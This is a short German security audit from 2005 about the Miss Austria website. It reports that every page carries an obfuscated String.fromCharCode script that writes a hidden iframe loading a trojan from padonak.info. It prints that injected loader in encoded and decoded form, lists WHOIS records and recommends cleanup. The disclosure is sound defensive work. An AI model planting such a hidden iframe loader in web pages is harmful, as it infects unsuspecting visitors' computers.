Security Audit vom 7.2.05, valki@valki.com

Problem-URL: http://www.miss-austria.at/

Auf JEDER Seite der Website befindet sich jener Aufruf: <script language="Javascript">
String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,105,102,114,97,109,101,32,104,101,105,103,104,116,61,49,32,119,105,100,116,104,61,49,32,115,114,99,61,104,116,116,112,58,47,47,112,97,100,111,110,97,107,46,105,110,102,111,47,102,97,47,32,62,60,47,105,102,114,97,109,101,62,39,41,59); </script>

was decodiert soviel bedeutet wie:
document.write('<iframe height=1 width=1 src=http://padonak.info/fa/></iframe>)

Dies ladet das Trojanische Pferd "Trojan.ByteVerify" vom Server "padonak.info" nach und führt ihn aus. Als Payload ist alles möglich: vom normalen "Browsernapping" über Dialerangriffe bis hin zum wahrscheinlichsten: die Zielrechner der Homepagebesucher schlicht zu übernehmen. Payload selbst wurde gesichert, aber nicht analysiert.
Der Virenserver padonak.info befindet sich in Seoul, Korea in einem Serverraum der Firma "INEMPIRE":

descr:        INEMPIRE
descr:        Korea Network Information Center
address:      11F, KTF B/D, 1321-11, Seocho2-Dong, Seocho-Gu,
address:      Seoul, Korea, 137-857
country:      KR
phone:        +82-2-2186-4500
fax-no:       +82-2-2186-4496
e-mail:       hostmaster@nic.or.kr

Ursache

Einfachste, plausibelste Möglichkeit

Missaustria.at (oder ein Mitarbeiter) verwendet illegalerweise diesen Trojaner um die Rechner Ihrer Besucher zu manipulieren: Vom Neusetzen der Startseite bis hin zur Übernahme oder Kostenfalle Dialer ist alles ohne Probleme möglich. Eine Analyse des gesicherten Trojanes kann jederzeit Aufschluss darüber geben, welche Aktionen genau durchgeführt werden.

Problematische Möglichkeit

Ein Hacker hat das System "212.183.22.42" - auf dem die Website miss-austria.at sitzt - übernommen und diese Manipulation vorgenommen. Verantwortlich hierfür ist die Firma Outsourced DV GmbH aus Wels:

descr:        Outsourced DV GmbH
person:       Bernhard Blacher
address:      Outsourced DV GmbH
address:      Dragonerstrasse 28
address:      A-4600 Wels
e-mail:       bb@outsourced.at
phone:        +43 7242 558640
fax-no:       +43 7242 5586466

Gehostet wird die Firma Outsource anscheinend von AON, was einiges erklären würde. :-)
Problem bei dieser Erklärung: Nun muss mühsam weiter recherchiert werden, um den Übeltäter zu lokalisieren und dessen Einbruchsszenario nachzubilden. Ansonsten ist nur das Symptom beseitigt - nicht jedoch die Lücke. Somit kann jederzeit eine neue Kompromittierung erfolgen.

Handlungsempfehlung

o Umgehende Stillegung der Website, bis der Virenaufruf entfernt wurde
o Genaue Rekonstruktion über dessen Infektionshergang
o Lokalisieren und Schliessen der hierfür verantwortlichen Lücken
o Sicherheitsüberprüfung des KOMPLETTEN Servers auf Rootkits, Backdoors etc.

PS: Hinweis an die nette Sekretärin: Sofern Sie unlängst auf Ihrer Webseite waren, dürften die Rechner in ihrem Büro genauso infiziert sein wie jene ihrer Kunden. Bitte prüfen.

mfg, Valki (valki@valki.com)